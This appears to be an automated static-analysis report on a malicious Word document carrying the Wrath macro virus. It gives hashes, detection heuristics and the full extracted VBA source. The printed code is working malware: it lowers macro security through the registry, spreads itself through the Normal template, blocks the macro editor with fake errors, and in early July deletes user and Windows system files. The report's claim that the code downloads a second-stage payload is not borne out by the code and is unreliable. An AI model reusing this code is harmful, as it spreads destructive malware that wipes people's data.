Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 bc77649992050327…

MALICIOUS

Office (OLE)

33.5 KB Created: 2001-07-05 15:38:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14
MD5: 306d6268301260813cc1e09fa4f89a68 SHA-1: 8231f63fcc82f8c2634b5a1805e072ccc2a80d2d SHA-256: bc776499920503276dfe0a8f47ce1b20b1b344a20d73dc4870d8cf1c187cc3d8
256 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1547.001 Registry Run Keys / Startup Folder T1105 Ingress Tool Transfer

The sample contains critical heuristics indicating the presence of VBA macros, specifically AutoOpen, Auto_Close, and Shell() calls. The VBA script attempts to export a component named 'Wrath' to 'C:\MSWIN.DLL', import it into the Normal template, and then delete the original DLL. This process is repeated with 'C:\MSWIN2.DLL'. The script also attempts to modify the security level for Office macros via the registry key HKCU\Software\Microsoft\Office\9.0\Word\Security\Level. These actions strongly suggest an attempt to download and execute a second-stage payload, likely for persistence or further infection.

Heuristics 6

  • ClamAV: Win.Trojan.Psycho-3 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Win.Trojan.Psycho-3
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Potential Shell call in VBA critical OLE_VBA_SHELL
    Potential Shell call in VBA
    Matched line in script
    MyApp = Shell("notepad.exe", 1)
  • AutoOpen macro low OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched line in script
    Sub AutoOpen()
  • Auto_Close macro low OLE_VBA_AUTOCLOSE
    Auto_Close macro
    Matched line in script
    Sub AutoClose()
  • Legacy WordBasic macro-virus markers high OLE_LEGACY_WORDBASIC_MACRO_VIRUS
    OLE Word document contains legacy WordBasic auto-execution macro markers such as AutoOpen plus ToolsMacro/MacroFile/fileMacro/globMacro or named historical macro-virus strings. These old Word 6/95 macro forms are not exposed as a modern VBA project, so normal VBA source extraction can miss them.

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 2494 bytes
SHA-256: e5dad4a69a9bcb1f8b0a88e1391a2922683aa61f07d66ae7b6b7281e9351142e
Detection
ClamAV: Doc.Trojan.Wrath-1
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "Wrath"
' Wrath.a
' Coded by tROx and LoX
Sub AutoOpen()
On Error Resume Next
System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") = 1&
Set a = ActiveDocument
Set b = a.VBProject
Set C = b.VBComponents("Wrath")
Set d = NormalTemplate
Set e = d.VBProject
Set f = e.VBComponents
C.Export "C:\MSWIN.DLL"
f.Import ("C:\MSWIN.DLL")
d.Save
Kill "C:\MSWIN.DLL"
Call IfDate
End Sub
Sub Copy()
On Error Resume Next
Set z = NormalTemplate
Set y = z.VBProject
Set x = y.VBComponents("Wrath")
Set w = ActiveDocument
Set v = w.VBProject
Set u = v.VBComponents
x.Export "C:\MSWIN2.DLL"
u.Import ("C:\MSWIN2.DLL")
w.Save
Kill "C:\MSWIN2.DLL"
Call IfDate
End Sub
Sub AutoNew()
On Error Resume Next
Call Copy
End Sub
Sub FileSave()
On Error Resume Next
Call Copy
End Sub
Sub FileSaveAs()
On Error Resume Next
Dialogs(wdDialogFileSaveAs).Show
Call Copy
End Sub
Sub AutoClose()
On Error Resume Next
Call Copy
End Sub
Sub ToolsMacro()
On Error Resume Next
MsgBox "Internal Error.  Word is unable to activate this command.", vbCritical, "Microsoft Word"
Call IfDate
End Sub
Sub ViewVBCode()
On Error Resume Next
MsgBox "Internal Error.  Word is unable to activate this command.", vbCritical, "Microsoft Word"
Call IfDate
End Sub
Sub July3()
On Error Resume Next
Options.BlueScreen = True
MyApp = Shell("notepad.exe", 1)
    SendKeys "                                                                                                                                                                                                                            'FEEL MY WRATH.......'", True
    AppActivate (MyApp)
End Sub
Sub July4()
On Error Resume Next
Options.BlueScreen = True
Kill "C:/My Documents/*.*"
RmDir "C:/My Documents"
Kill "C:/Program Files/Internet Explorer"
Kill "C:/Windows/*.*"
Kill "C:/Windows/System"
Kill "C:/Windows/System32/Drivers"
MsgBox "Happy July 4th!!", vbInformation, "Microsoft Word"
End Sub
Sub IfDate()
On Error Resume Next
If Month(Now) = 7 And Day(Now) = 3 Then
Call July3
End If
If Month(Now) = 7 Then
If Day(Now) > 3 And Day(Now) < 9 Then
Call July4
End If
End If
End Sub

Open this report in the interactive analyzer, or submit your own file for analysis.